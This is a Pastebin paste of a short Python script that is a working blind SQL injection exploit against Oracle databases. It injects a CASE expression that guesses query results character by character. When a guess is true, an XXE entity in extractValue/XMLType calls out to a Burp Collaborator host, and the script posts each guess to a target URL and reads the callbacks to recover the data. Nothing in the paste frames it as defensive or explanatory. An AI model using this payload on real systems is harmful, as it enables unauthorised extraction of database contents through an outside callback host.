Advertisement
Guest User

Untitled

a guest
May 27th, 2019
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.58 KB | None | 0 0
  1. tpl = """'||(SELECT CASE WHEN ASCII(SUBSTR(({s._query}),{s._pos},1))<{guess} \
  2. THEN extractValue(XMLType('<?xml version="1.0" encoding="UTF-8"?>\
  3. <!DOCTYPE poc [ <!ENTITY % s2 SYSTEM "http://{payload}/">%s2;]>'),'/l') \
  4. ELSE '' END FROM dual)||'"""
  5.  
  6. class OracleDuncan(duncan.Duncan):
  7. def decide(self, guess):
  8. c = Client()
  9. payload = c.generate_payload(include_location=True)
  10. requests.post(url, data={'q': tpl.format(s=self, guess=guess,
  11. payload=payload)}, allow_redirects=False)
  12. return c.fetch_collaborator_interactions_for(payload)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement